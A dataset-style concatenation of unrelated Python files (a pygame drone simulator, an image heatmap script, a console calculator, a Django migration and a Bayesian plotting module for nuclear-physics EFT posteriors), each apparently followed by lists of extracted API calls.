            self.real_pos = {'x': -(larg / 2 - self.posH), 'y': alt - 100 - self.posV}
            self.posH, self.posV = self.x[2] + larg / 2, alt - 100 - self.x[3]
            self.eP = np.array([destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']])
            self.drone.drone_update(self.position, self.angle)
            return False
class Game:
    """Top-level game loop: creates the screen and controller, then runs the
    frame/event loop until the window is closed."""
    def __init__(self, larg, alt, bg_image, drone_image):
        self.screen = Screen(larg, alt, bg_image)
        self.control = Drone_Control(drone_image)
        self.clock = pygame.time.Clock()
        # NOTE(review): self.ticks is set but never read; run() uses the
        # module-global FPS instead.
        self.ticks = 60
        self.exit = False
    def run(self):
        """Main loop.  Publishes the frame timestep ``t`` and the click
        destination (mx_real, my_real) as module globals, which
        Drone_Control and Screen read."""
        global t, FPS
        FPS = 600
        auto_move = False
        global mx_real, my_real
        mx_real, my_real = 0, 0
        while True:
            self.clock.tick(FPS)  # Game FPS
            # Frame time in seconds, used as the PID integration step.
            t = self.clock.get_time() / 1000
            self.screen.update_screen()
            for event in pygame.event.get():
                # To quit the game
                if event.type == QUIT:
                    pygame.quit()
                    exit()
                if event.type == pygame.MOUSEBUTTONDOWN:
                    auto_move = True
                    # Get the destiny's position from mouse click
                    mx, my = pygame.mouse.get_pos()
                    # Transform the mouse click point in real coordinates
                    mx_real, my_real = -(larg / 2 - mx), alt - 100 - my
                    # print(mx_real, my_real)
            # Mouse target takes priority; auto_move flips back to False once
            # the controller reports the target reached.
            if auto_move:
                auto_move = self.control.mouse_control(mx_real, my_real)
            else:
                self.control.key_control()
            pygame.display.update()
if __name__ == '__main__':
    # Asset paths; note that Screen/Drone load the pre-resized copies
    # ('*_resized.*'), which must already exist on disk.
    bg_image = 'Imagens/ghibli_background.jpg'
    drone_image = 'Imagens/drone.png'
    game = Game(larg, alt, bg_image, drone_image)
    game.run()
| [
"numpy.abs",
"PIL.Image.open",
"sys.exit",
"pygame.init",
"pygame.quit",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.mouse.get_pos",
"pygame.time.Clock",
"pygame.transform.rotate",
"numpy.array",
"pygame.key.get_pressed",
"pygame.display.set_caption",
"pygame.image.load",
"pyg... | [((315, 328), 'pygame.init', 'pygame.init', ([], {}), '()\n', (326, 328), False, 'import pygame\n'), ((353, 404), 'pygame.display.set_caption', 'pygame.display.set_caption', (['"""Simulador 2D de Drone"""'], {}), "('Simulador 2D de Drone')\n", (379, 404), False, 'import pygame\n'), ((478, 531), 'pygame.image.load', 'pygame.image.load', (['"""Imagens/Imagem_fundo_resized.jpg"""'], {}), "('Imagens/Imagem_fundo_resized.jpg')\n", (495, 531), False, 'import pygame\n'), ((602, 648), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(self.larg, self.alt)'], {}), '((self.larg, self.alt))\n', (625, 648), False, 'import pygame\n'), ((747, 767), 'PIL.Image.open', 'Image.open', (['bg_image'], {}), '(bg_image)\n', (757, 767), False, 'from PIL import Image\n'), ((1164, 1208), 'pygame.font.SysFont', 'pygame.font.SysFont', (['"""arial"""', '(15)', '(True)', '(True)'], {}), "('arial', 15, True, True)\n", (1183, 1208), False, 'import pygame\n'), ((2222, 2268), 'pygame.image.load', 'pygame.image.load', (['"""Imagens/drone_resized.png"""'], {}), "('Imagens/drone_resized.png')\n", (2239, 2268), False, 'import pygame\n'), ((2574, 2597), 'PIL.Image.open', 'Image.open', (['drone_image'], {}), '(drone_image)\n', (2584, 2597), False, 'from PIL import Image\n'), ((2757, 2799), 'pygame.transform.rotate', 'pygame.transform.rotate', (['self.drone', 'angle'], {}), '(self.drone, angle)\n', (2780, 2799), False, 'import pygame\n'), ((3946, 4094), 'numpy.array', 'np.array', (["[self.w1, self.w2, self.real_pos['x'], self.real_pos['y'], self.v1, self.v2,\n self.angle * np.pi / 180.0, self.ang_vel * np.pi / 180.0]"], {}), "([self.w1, self.w2, self.real_pos['x'], self.real_pos['y'], self.v1,\n self.v2, self.angle * np.pi / 180.0, self.ang_vel * np.pi / 180.0])\n", (3954, 4094), True, 'import numpy as np\n'), ((4129, 4145), 'numpy.array', 'np.array', (['[1, 1]'], {}), '([1, 1])\n', (4137, 4145), True, 'import numpy as np\n'), ((4234, 4258), 'pygame.key.get_pressed', 
'pygame.key.get_pressed', ([], {}), '()\n', (4256, 4258), False, 'import pygame\n'), ((5067, 5141), 'numpy.array', 'np.array', (["[destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']]"], {}), "([destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']])\n", (5075, 5141), True, 'import numpy as np\n'), ((6482, 6501), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (6499, 6501), False, 'import pygame\n'), ((5260, 5306), 'PID.execute_PID', 'execute_PID', (['self.x', '[destiny_x, destiny_y]', 't'], {}), '(self.x, [destiny_x, destiny_y], t)\n', (5271, 5306), False, 'from PID import execute_PID\n'), ((6163, 6237), 'numpy.array', 'np.array', (["[destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']]"], {}), "([destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']])\n", (6171, 6237), True, 'import numpy as np\n'), ((6793, 6811), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (6809, 6811), False, 'import pygame\n'), ((7325, 7348), 'pygame.display.update', 'pygame.display.update', ([], {}), '()\n', (7346, 7348), False, 'import pygame\n'), ((5147, 5165), 'numpy.abs', 'np.abs', (['self.eP[0]'], {}), '(self.eP[0])\n', (5153, 5165), True, 'import numpy as np\n'), ((5175, 5193), 'numpy.abs', 'np.abs', (['self.eP[1]'], {}), '(self.eP[1])\n', (5181, 5193), True, 'import numpy as np\n'), ((5203, 5220), 'numpy.abs', 'np.abs', (['self.ePhi'], {}), '(self.ePhi)\n', (5209, 5220), True, 'import numpy as np\n'), ((6868, 6881), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (6879, 6881), False, 'import pygame\n'), ((6887, 6893), 'sys.exit', 'exit', ([], {}), '()\n', (6891, 6893), False, 'from sys import exit\n'), ((7032, 7054), 'pygame.mouse.get_pos', 'pygame.mouse.get_pos', ([], {}), '()\n', (7052, 7054), False, 'import pygame\n')] |
import os
import math
import numpy as np
from skimage import transform, io
from PIL import Image
import os
# Block-sum "heatmap" generation from a large mask TIFF.
Image.MAX_IMAGE_PIXELS = None  # disable PIL's decompression-bomb guard for huge TIFFs
root_path = r'X:\test_image\output'
image_name = 'mask.tiff'
output_name = 'new_heatmap.tiff'
img_path = os.path.join(root_path, image_name)
output_path = os.path.join(root_path, output_name)
# Downsample by 2 in both dimensions.
image = io.imread(img_path)[::2, ::2].astype('uint8')
heat_map = np.zeros(image.shape).astype('uint16')
h, w = image.shape
r = 20
index = 255 // (r + 1)
offset = 10
# NOTE(review): r/index/offset belong to the disabled per-pixel radial
# blur below and are unused by the block-sum loop that replaced it.
# for i in range(h):
#     for j in range(w):
#         if image[i, j] != 0:
#             for m in range(-r, r):
#                 for n in range(-r, r):
#                     if 0 <= j + n < w and 0 <= i + m < h:
#                         distant = int((n ** 2 + m ** 2) ** 0.5)
#                         if distant <= r:
#                             distant = distant * index + offset
#                             if distant != 0:
#                                 heat_map[i + m, j + n] += image[i, j] // distant
#                             else:
#                                 heat_map[i, j] += image[i, j]
# Fill each step x step tile with the sum of the corresponding image tile.
step = 50
for i in range(0, h, step):
    for j in range(0, w, step):
        heat_map[i:i + step, j:j + step] = image[i:i + step, j:j + step].sum()
    if i % 1000 == 0:
        print(i)
# NOTE(review): .astype('uint8') binds to np.linalg.norm(...) -- it
# truncates the scalar norm to uint8 *before* dividing, which is almost
# certainly not intended (likely meant (heat_map / norm).astype('uint8')).
norm1 = heat_map / np.linalg.norm(heat_map).astype('uint8')
g_layer = np.zeros(image.shape).astype('uint8')
b_layer = np.zeros(image.shape).astype('uint8')
# NOTE(review): axis=0 stacking yields channel-first (3, H, W); confirm
# that the TIFF writer interprets this as intended (imsave usually
# expects (H, W, 3)).
result = np.stack([norm1, g_layer, b_layer], axis=0).astype('uint8')
io.imsave(output_path, result)
print(result.shape)
| [
"os.path.join",
"numpy.stack",
"numpy.zeros",
"skimage.io.imread",
"skimage.io.imsave",
"numpy.linalg.norm"
] | [((244, 279), 'os.path.join', 'os.path.join', (['root_path', 'image_name'], {}), '(root_path, image_name)\n', (256, 279), False, 'import os\n'), ((294, 330), 'os.path.join', 'os.path.join', (['root_path', 'output_name'], {}), '(root_path, output_name)\n', (306, 330), False, 'import os\n'), ((1533, 1563), 'skimage.io.imsave', 'io.imsave', (['output_path', 'result'], {}), '(output_path, result)\n', (1542, 1563), False, 'from skimage import transform, io\n'), ((398, 419), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (406, 419), True, 'import numpy as np\n'), ((1378, 1399), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (1386, 1399), True, 'import numpy as np\n'), ((1426, 1447), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (1434, 1447), True, 'import numpy as np\n'), ((1473, 1516), 'numpy.stack', 'np.stack', (['[norm1, g_layer, b_layer]'], {'axis': '(0)'}), '([norm1, g_layer, b_layer], axis=0)\n', (1481, 1516), True, 'import numpy as np\n'), ((340, 359), 'skimage.io.imread', 'io.imread', (['img_path'], {}), '(img_path)\n', (349, 359), False, 'from skimage import transform, io\n'), ((1327, 1351), 'numpy.linalg.norm', 'np.linalg.norm', (['heat_map'], {}), '(heat_map)\n', (1341, 1351), True, 'import numpy as np\n')] |
from ClassCalculator import Calculator
class Main:
    """Console calculator loop: shows a menu, parses 'x OP y' input and
    dispatches to Calculator."""

    def get_input(self, message):
        """Prompt the user and return the raw line (separated out so it can
        be stubbed in tests)."""
        return input(message)

    def menu(self):
        """Run the prompt loop until the user asks to quit."""
        running = True
        while running:
            m = "---Menu---\n"
            m += "Escribe la abreviación adecuada\n"
            m += "Suma: x mas y\nResta: x menos y\nMultiplicacion: x por y\nDivision: x entre y\n"
            m += "Potencia: x elevado_a y\nRaiz: x raiz_de y\nPara salir escriba 'salir'\n\n"
            inpt = self.get_input(m)
            # Fix: the prompt tells the user to type 'salir', but the code
            # only recognised 'Exit' (typing 'salir' crashed on int('salir')).
            # Accept both for backward compatibility.
            if inpt in ('salir', 'Exit'):
                print("\nHasta pronto.")
                running = False
            else:
                data = inpt.split(' ')
                print("Resultado = " + str(self.Calc(int(data[0]), data[1], int(data[2]))))

    def Calc(self, a, oper, b):
        """Dispatch the operation keyword to the matching Calculator method
        and return its result."""
        X = Calculator(a, b)
        switch = {
            'mas': X.suma,
            'menos': X.resta,
            'por': X.multi,
            'entre': X.divi,
            'elevado_a': X.pote,
            'raiz_de': X.raiz
        }
        return switch.get(oper)()
Cycle = Main()
print(Cycle.menu()) | [
"ClassCalculator.Calculator"
] | [((803, 819), 'ClassCalculator.Calculator', 'Calculator', (['a', 'b'], {}), '(a, b)\n', (813, 819), False, 'from ClassCalculator import Calculator\n')] |
# Generated by Django 2.2.8 on 2019-12-19 03:54
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: sets default ordering (by horn_length) and
    # the admin plural label for the 'ox' model.  Metadata-only change;
    # no database schema is altered.
    dependencies = [
        ('database_models', '0006_ox'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='ox',
            options={'ordering': ['horn_length'], 'verbose_name_plural': '뿔의 길이'},
        ),
    ]
| [
"django.db.migrations.AlterModelOptions"
] | [((219, 334), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""ox"""', 'options': "{'ordering': ['horn_length'], 'verbose_name_plural': '뿔의 길이'}"}), "(name='ox', options={'ordering': ['horn_length'\n ], 'verbose_name_plural': '뿔의 길이'})\n", (247, 334), False, 'from django.db import migrations\n')] |
import gsum as gm
import numpy as np
from numpy import ndarray
import matplotlib.pyplot as plt
from matplotlib.patches import Patch
import matplotlib.patches as mpatches
from matplotlib.patches import Ellipse
from matplotlib.legend_handler import HandlerPatch
from matplotlib.legend import Legend
from matplotlib.ticker import MultipleLocator, AutoMinorLocator, MaxNLocator
import docrep
from sklearn.gaussian_process.kernels import RBF, ConstantKernel, Kernel
import seaborn as sns
from seaborn import utils
import pandas as pd
from .matter import nuclear_density, fermi_momentum, ratio_kf
from .graphs import confidence_ellipse, confidence_ellipse_mean_cov
from os.path import join
from scipy import stats
from copy import deepcopy
from os import path
# Shared docstring processor; registers gsum's ConjugateGaussianProcess
# docstring sections so they can be re-used in this module's docstrings.
docstrings = docrep.DocstringProcessor()
docstrings.get_sections(str(gm.ConjugateGaussianProcess.__doc__), 'ConjugateGaussianProcess')
# Common color constants and the bbox style used for in-axes text labels.
black = 'k'
softblack = 'k'
gray = '0.75'
darkgray = '0.5'
text_bbox = dict(boxstyle='round', fc=(1, 1, 1, 0.6), ec=black, lw=0.8)
class HandlerEllipse(HandlerPatch):
    """Legend handler that renders Ellipse patches as ellipses (instead of
    the default rectangle swatch)."""
    def create_artists(self, legend, orig_handle,
                       xdescent, ydescent, width, height, fontsize, trans):
        # Center the ellipse inside the legend handle box.
        center = 0.5 * width - 0.5 * xdescent, 0.5 * height - 0.5 * ydescent
        p = mpatches.Ellipse(xy=center, width=width + xdescent,
                             height=height + ydescent)
        # Copy color/line properties from the original handle.
        self.update_prop(p, orig_handle, legend)
        p.set_transform(trans)
        return [p]
# Register globally: every Ellipse in a legend now uses HandlerEllipse.
Legend.update_default_handler_map({Ellipse: HandlerEllipse()})
def compute_breakdown_posterior(model, X, data, orders, max_idx, logprior, breakdowns, lengths=None):
    """Posterior pdf of the breakdown scale, marginalized over length scale.

    Fits the truncation GP to the orders up to ``max_idx``, evaluates the
    log marginal likelihood on a (length, breakdown) grid, adds the log
    prior, and integrates out the length scale.

    Parameters
    ----------
    model : gm.TruncationGP
    X : ndarray
        Input points the observables were evaluated at.
    data : ndarray
        Order-by-order predictions; columns beyond ``max_idx`` are ignored.
    orders : ndarray
        EFT orders corresponding to the data columns.
    max_idx : int
        Highest order (column index) included in the fit.
    logprior : ndarray
        Log prior on the (length, breakdown) grid; added to the log likelihood.
    breakdowns : ndarray
        Grid of candidate breakdown scales.
    lengths : ndarray, optional
        Grid of length scales.  If None, uses the single fitted length
        scale from the GP kernel.

    Returns
    -------
    pdf : ndarray, shape = (N,)
        Normalized posterior over ``breakdowns``.
    """
    model.fit(X, data[:, :max_idx+1], orders=orders[:max_idx+1])
    if lengths is None:
        log_ell = model.coeffs_process.kernel_.theta
        lengths = np.exp(log_ell)
    else:
        log_ell = np.log(lengths)
    log_like = np.array([[model.log_marginal_likelihood([t], breakdown=lb) for lb in breakdowns] for t in log_ell])
    log_like += logprior
    # Subtract the max before exponentiating for numerical stability.
    posterior_2d = np.exp(log_like - np.max(log_like))
    # Integrate out the length scale, then normalize over breakdowns.
    breakdown_pdf = np.trapz(posterior_2d, x=lengths, axis=0)
    breakdown_pdf /= np.trapz(breakdown_pdf, x=breakdowns)  # Normalize
    return breakdown_pdf
def compute_pdf_median_and_bounds(x, pdf, cred):
    R"""Computes the median and credible intervals for a 1d pdf

    Parameters
    ----------
    x : 1d array
        The input variable
    pdf : 1d array
        The normalized pdf
    cred : Iterable
        The credible intervals in the range (0, 1)

    Returns
    -------
    median : float
    bounds : ndarray, shape = (len(cred), 2)
    """
    # One [lower, upper] highest-density interval per requested level.
    bounds = np.zeros((len(cred), 2))
    for row, level in zip(bounds, cred):
        row[:] = gm.hpd_pdf(pdf=pdf, alpha=level, x=x)
    median = gm.median_pdf(pdf=pdf, x=x)
    return median, bounds
def draw_summary_statistics(bounds68, bounds95, median, height=0., linewidth=1., ax=None):
    """Draw 68%/95% interval bars and a white median dot at a given height."""
    if ax is None:
        ax = plt.gca()
    y_pair = [height, height]
    # Thick bar for the 68% interval, thin bar for the 95% interval
    # (drawn in that order, matching the original layering).
    for interval, width in ((bounds68, 3 * linewidth), (bounds95, linewidth)):
        ax.plot(interval, y_pair, c=darkgray, lw=width, solid_capstyle='round')
    # Median marker sits on top of both bars.
    ax.plot([median], [height], c='white', marker='o', zorder=10, markersize=1.5 * linewidth)
    return ax
def offset_xlabel(ax):
    """Reserve x-axis label space without showing anything visible: one
    white tick label at 0 and zero-length tick marks."""
    ax.tick_params(axis='x', length=0)
    ax.set_xticks([0])
    ax.set_xticklabels(labels=[0], fontdict={'color': 'w'})
    return ax
def joint_plot(ratio=1, height=3.):
    """Taken from Seaborn JointGrid

    Builds a square figure with a central joint axis and two marginal axes
    (top and right) that share the joint axis' x/y respectively.

    Returns
    -------
    fig, ax_joint, ax_marg_x, ax_marg_y
    """
    fig = plt.figure(figsize=(height, height))
    # (ratio+1) x (ratio+1) grid: row 0 / last column hold the marginals.
    gsp = plt.GridSpec(ratio+1, ratio+1)
    ax_joint = fig.add_subplot(gsp[1:, :-1])
    ax_marg_x = fig.add_subplot(gsp[0, :-1], sharex=ax_joint)
    ax_marg_y = fig.add_subplot(gsp[1:, -1], sharey=ax_joint)
    # Turn off tick visibility for the measure axis on the marginal plots
    plt.setp(ax_marg_x.get_xticklabels(), visible=False)
    plt.setp(ax_marg_y.get_yticklabels(), visible=False)
    # Turn off the ticks on the density axis for the marginal plots
    plt.setp(ax_marg_x.yaxis.get_majorticklines(), visible=False)
    plt.setp(ax_marg_x.yaxis.get_minorticklines(), visible=False)
    plt.setp(ax_marg_y.xaxis.get_majorticklines(), visible=False)
    plt.setp(ax_marg_y.xaxis.get_minorticklines(), visible=False)
    plt.setp(ax_marg_x.get_yticklabels(), visible=False)
    plt.setp(ax_marg_y.get_xticklabels(), visible=False)
    ax_marg_x.yaxis.grid(False)
    ax_marg_y.xaxis.grid(False)
    # Make the grid look nice
    # utils.despine(fig)
    utils.despine(ax=ax_marg_x, left=True)
    utils.despine(ax=ax_marg_y, bottom=True)
    fig.tight_layout(h_pad=0, w_pad=0)
    ax_marg_y.tick_params(axis='y', which='major', direction='out')
    ax_marg_x.tick_params(axis='x', which='major', direction='out')
    ax_marg_y.tick_params(axis='y', which='minor', direction='out')
    ax_marg_x.tick_params(axis='x', which='minor', direction='out')
    ax_marg_y.margins(x=0.1, y=0.)
    fig.subplots_adjust(hspace=0, wspace=0)
    return fig, ax_joint, ax_marg_x, ax_marg_y
def compute_2d_posterior(model, X, data, orders, breakdown, ls=None, logprior=None, max_idx=None):
    R"""Joint and marginal posteriors of (length scale, breakdown scale).

    Parameters
    ----------
    model : gm.TruncationGP
    X : ndarray, shape = (N,None)
    data : ndarray, shape = (N,[n_curves])
    orders : ndarray, shape = (n_curves,)
    max_idx : ndarray, shape = (n_orders,)
        If given, only columns up to max_idx are fit.
    breakdown : ndarray, shape = (n_breakdown,)
    ls : ndarray, shape = (n_ls,)
        If None, the single fitted length scale from the GP kernel is used.
    logprior : ndarray, optional, shape = (n_ls, n_breakdown)

    Returns
    -------
    joint_pdf : ndarray
    ratio_pdf : ndarray
    ls_pdf : ndarray
    """
    if max_idx is not None:
        data = data[:, :max_idx + 1]
        orders = orders[:max_idx + 1]
    model.fit(X, data, orders=orders)
    if ls is None:
        ls = np.exp(model.coeffs_process.kernel_.theta)
        print('Setting ls to', ls)
    ls = np.atleast_1d(ls)
    # log_like = np.array([
    #     [model.log_marginal_likelihood(theta=[np.log(ls_), ], breakdown=lb) for lb in breakdown] for ls_ in ls
    # ])
    # Parallel version of the commented-out double loop above: evaluate the
    # log marginal likelihood on the full (ls, breakdown) grid.
    from joblib import Parallel, delayed
    import multiprocessing
    num_cores = multiprocessing.cpu_count()
    log_like = np.array(
        Parallel(n_jobs=num_cores, prefer='processes')(
            delayed(model.log_marginal_likelihood)(theta=[np.log(ls_), ], breakdown=lb)
            for ls_ in ls for lb in breakdown
        )
    ).reshape(len(ls), len(breakdown))
    if logprior is not None:
        log_like += logprior
    # Subtract the max before exponentiating for numerical stability.
    joint_pdf = np.exp(log_like - np.max(log_like))
    if len(ls) > 1:
        ratio_pdf = np.trapz(joint_pdf, x=ls, axis=0)
    else:
        ratio_pdf = np.squeeze(joint_pdf)
    ls_pdf = np.trapz(joint_pdf, x=breakdown, axis=-1)
    # Normalize them
    ratio_pdf /= np.trapz(ratio_pdf, x=breakdown, axis=0)
    if len(ls) > 1:
        ls_pdf /= np.trapz(ls_pdf, x=ls, axis=0)
    return joint_pdf, ratio_pdf, ls_pdf
def plot_2d_joint(ls_vals, Lb_vals, like_2d, like_ls, like_Lb, data_str=r'\vec{\mathbf{y}}_k)',
                  xlabel=None, ylabel=None):
    """Contour plot of the joint (ls, Lb) posterior with both marginals.

    Parameters
    ----------
    ls_vals, Lb_vals : 1d arrays
        Grids for the length scale and breakdown scale.
    like_2d : 2d array, shape = (len(ls_vals), len(Lb_vals))
        Joint posterior on the grid.
    like_ls, like_Lb : 1d arrays
        Marginal posteriors plotted on the top / right axes.
    data_str : str, optional
        LaTeX fragment naming the conditioning data in the axis label.

    Returns
    -------
    fig : matplotlib Figure
    """
    if data_str is None:
        data_str = r'\vec{\mathbf{y}}_k)'
    from matplotlib.cm import get_cmap
    with plt.rc_context({"text.usetex": True, "text.latex.preview": True}):
        cmap_name = 'Blues'
        cmap = get_cmap(cmap_name)
        # Setup axes
        fig, ax_joint, ax_marg_x, ax_marg_y = joint_plot(ratio=5, height=3.4)
        # Plot contour
        # Contour levels correspond to Gaussian "sigma" rings exp(-r^2/2).
        ax_joint.contour(ls_vals, Lb_vals, like_2d.T,
                         levels=[np.exp(-0.5*r**2) for r in np.arange(9, 0, -0.5)] + [0.999],
                         cmap=cmap_name, vmin=-0.05, vmax=0.8, zorder=1)
        # Now plot the marginal distributions
        ax_marg_y.plot(like_Lb, Lb_vals, c=cmap(0.8), lw=1)
        ax_marg_y.fill_betweenx(Lb_vals, np.zeros_like(like_Lb),
                                like_Lb, facecolor=cmap(0.2), lw=1)
        ax_marg_x.plot(ls_vals, like_ls, c=cmap(0.8), lw=1)
        ax_marg_x.fill_between(ls_vals, np.zeros_like(ls_vals),
                               like_ls, facecolor=cmap(0.2), lw=1)
        # Formatting
        ax_joint.set_xlabel(xlabel)
        ax_joint.set_ylabel(ylabel)
        ax_joint.margins(x=0, y=0.)
        ax_marg_x.set_ylim(bottom=0)
        ax_marg_y.set_xlim(left=0)
        ax_joint.text(
            0.95, 0.95, rf'pr$(\ell, \Lambda_b \,|\, {data_str}$)', ha='right', va='top',
            transform=ax_joint.transAxes,
            bbox=text_bbox
        )
        ax_joint.tick_params(direction='in')
        plt.show()
    return fig
def pdfplot(
        x, y, pdf, data, hue=None, order=None, hue_order=None, cut=1e-2, linewidth=None,
        palette=None, saturation=1., ax=None, margin=None, legend_title=None, loc='best'
):
    R"""Like seaborn's violinplot, but takes PDF values rather than tabular data.

    Parameters
    ----------
    x : str
        The column of the DataFrame to use as the x axis. The pdfs are a function of this variable.
    y : str
        The column of the DataFrame to use as the y axis. A pdf will be drawn for each unique value in data[y].
    pdf : str
        The column of the DataFrame to use as the pdf values.
    data : pd.DataFrame
        The DataFrame containing the pdf data
    hue : str, optional
        Splits data[y] up by the value of hue, and plots each pdf separately as a specific color.
    order : list, optional
        The order in which to plot the y values, from top to bottom
    hue_order : list, optional
        The order in which to plot the hue values, from top to bottom.
    cut : float, optional
        The value below which the pdfs will not be shown. This is taken as a fraction of the total height of each pdf.
    linewidth : float, optional
        The linewidth of the pdf lines
    palette : str, list, optional
        The color palette to fill underneath the curves
    saturation : float, optional
        The level of saturation for the color palette. Only works if the palette is a string recognized by
        sns.color_palette
    ax : matplotlib.axes.Axes
        The axis on which to draw the plot
    margin : float, optional
        The vertical margin between each pdf.
    """
    if ax is None:
        fig, ax = plt.subplots(1, 1, figsize=(3.4, 3.4))
    y_vals = data[y].unique()
    if order is not None:
        y_vals = order
    legend_vals = y_vals
    hue_vals = [None]
    n_colors = len(y_vals)
    if hue is not None:
        hue_vals = data[hue].unique()
        if hue_order is not None:
            hue_vals = hue_order
        legend_vals = hue_vals
        n_colors = len(hue_vals)
    if isinstance(palette, str) or palette is None:
        colors = sns.color_palette(palette, n_colors=n_colors, desat=saturation)
    elif isinstance(palette, list):
        colors = palette
    else:
        raise ValueError('palette must be str or list')
    if margin is None:
        _, margin = plt.margins()
    # Ridgeline layout: each pdf occupies one unit of height, stacked
    # downward from offset=1 with `margin` between rows.
    offset = 1.
    minor_ticks = []
    major_ticks = []
    for i, y_val in enumerate(y_vals):
        max_height_hue = offset - margin
        for j, hue_val in enumerate(hue_vals):
            mask = data[y] == y_val
            if hue is not None:
                mask = mask & (data[hue] == hue_val)
                color = colors[j]
            else:
                color = colors[i]
            df = data[mask]
            x_vals = df[x].values
            pdf_vals = df[pdf].values.copy()
            pdf_vals /= np.trapz(pdf_vals, x_vals)
            # Assumes normalized
            median, bounds = compute_pdf_median_and_bounds(
                x=x_vals, pdf=pdf_vals, cred=[0.68, 0.95]
            )
            pdf_vals /= (1. * np.max(pdf_vals))  # Scale so they're all the same height
            # Make the lines taper off
            x_vals = x_vals[pdf_vals > cut]
            pdf_vals = pdf_vals[pdf_vals > cut]
            offset -= (1 + margin)
            # Plot and fill posterior, and add summary statistics
            ax.plot(x_vals, pdf_vals + offset, c=darkgray, lw=linewidth)
            ax.fill_between(x_vals, offset, pdf_vals + offset, facecolor=color)
            draw_summary_statistics(*bounds, median, ax=ax, height=offset, linewidth=1.5*linewidth)
        min_height_hue = offset
        # Minor ticks separate y-groups; major ticks center the group labels.
        minor_ticks.append(offset - margin/2.)
        major_ticks.append((max_height_hue + min_height_hue) / 2.)
    minor_ticks = minor_ticks[:-1]
    # Plot formatting
    ax.set_yticks(major_ticks, minor=False)
    ax.set_yticks(minor_ticks, minor=True)
    ax.set_yticklabels(y_vals, fontdict=dict(verticalalignment='center'))
    ax.tick_params(axis='both', which='both', direction='in')
    ax.tick_params(which='major', length=0)
    ax.tick_params(which='minor', length=7, right=True)
    ax.set_xlabel(x)
    ax.set_axisbelow(True)
    if hue is not None:
        legend_elements = [
            Patch(facecolor=color, edgecolor=darkgray, label=leg_val) for color, leg_val in zip(colors, legend_vals)
        ]
        ax.legend(handles=legend_elements, loc=loc, title=legend_title)
    return ax
def joint2dplot(ls_df, breakdown_df, joint_df, system, order, data_str=None):
    """Slice the three posterior DataFrames down to one (system, order)
    pair and delegate plotting to plot_2d_joint.  Returns the figure."""
    def _select(df):
        # Keep only rows for this system at this order.
        return df[(df['system'] == system) & (df['Order'] == order)]

    ls_df = _select(ls_df)
    breakdown_df = _select(breakdown_df)
    joint_df = _select(joint_df)
    ls = ls_df[r'$\ell$ [fm$^{-1}$]']
    breakdown = breakdown_df[r'$\Lambda_b$ [MeV]']
    # The joint pdf is stored flat; restore the (n_ls, n_breakdown) grid.
    joint = joint_df['pdf'].values.reshape(len(ls), len(breakdown))
    return plot_2d_joint(
        ls_vals=ls, Lb_vals=breakdown, like_2d=joint,
        like_ls=ls_df['pdf'].values, like_Lb=breakdown_df['pdf'].values,
        data_str=data_str, xlabel=r'$\ell$ [fm$^{-1}$]', ylabel=r'$\Lambda_b$ [MeV]',
    )
def minimum_samples(mean, cov, n=5000, x=None, random_state=None):
    """Sample the location and value of the minimum of a Gaussian process.

    Draws `n` curves from a multivariate normal distribution with the given
    mean vector and covariance matrix, and records the minimum of each curve.

    Parameters
    ----------
    mean : ndarray, shape = (N,)
        The GP mean evaluated on the grid.
    cov : ndarray, shape = (N, N)
        The GP covariance evaluated on the grid.
    n : int, optional
        The number of sample curves to draw. Defaults to 5000.
    x : ndarray, shape = (N,), optional
        The grid itself. If given, the first return value holds the
        x-locations of the minima rather than their grid indices.
    random_state : int, RandomState, or Generator, optional
        Seed forwarded to ``rvs`` so draws can be made reproducible.
        Defaults to ``None`` (non-deterministic), matching prior behavior.

    Returns
    -------
    min_x_or_idxs, min_y : ndarray, shape = (n,)
        The locations (or indices, if `x` is None) and values of the minima.
    """
    gp = stats.multivariate_normal(mean=mean, cov=cov)
    samples = gp.rvs(n, random_state=random_state)
    min_idxs = np.argmin(samples, axis=1)
    min_y = np.min(samples, axis=1)
    if x is not None:
        # Convert grid indices to the physical x-locations of the minima
        return x[min_idxs], min_y
    return min_idxs, min_y
# def confidence_ellipse(x, y, ax, n_std=3.0, facecolor='none', **kwargs):
# """
# Create a plot of the covariance confidence ellipse of *x* and *y*.
#
# Parameters
# ----------
# x, y : array-like, shape (n, )
# Input data.
# ax : matplotlib.axes.Axes
# The axes object to draw the ellipse into.
# n_std : float
# The number of standard deviations to determine the ellipse's radii.
# facecolor : str
# The color of the ellipse
#
# Returns
# -------
# matplotlib.patches.Ellipse
#
# Other parameters
# ----------------
# kwargs : `~matplotlib.patches.Patch` properties
# """
# import matplotlib.transforms as transforms
# if x.size != y.size:
# raise ValueError("x and y must be the same size")
#
# cov = np.cov(x, y)
# pearson = cov[0, 1]/np.sqrt(cov[0, 0] * cov[1, 1])
# # Using a special case to obtain the eigenvalues of this
# # two-dimensional dataset.
# ell_radius_x = np.sqrt(1 + pearson)
# ell_radius_y = np.sqrt(1 - pearson)
# ellipse = Ellipse(
# (0, 0),
# width=ell_radius_x * 2,
# height=ell_radius_y * 2,
# facecolor=facecolor,
# **kwargs
# )
#
# # Calculating the standard deviation of x from
# # the square root of the variance and multiplying
# # with the given number of standard deviations.
# scale_x = np.sqrt(cov[0, 0]) * n_std
# mean_x = np.mean(x)
#
# # calculating the standard deviation of y ...
# scale_y = np.sqrt(cov[1, 1]) * n_std
# mean_y = np.mean(y)
#
# trans = transforms.Affine2D() \
# .rotate_deg(45) \
# .scale(scale_x, scale_y) \
# .translate(mean_x, mean_y)
#
# ellipse.set_transform(trans + ax.transData)
# # sns.kdeplot(x, y, ax=ax)
# scat_color = darken_color(facecolor, 0.5)
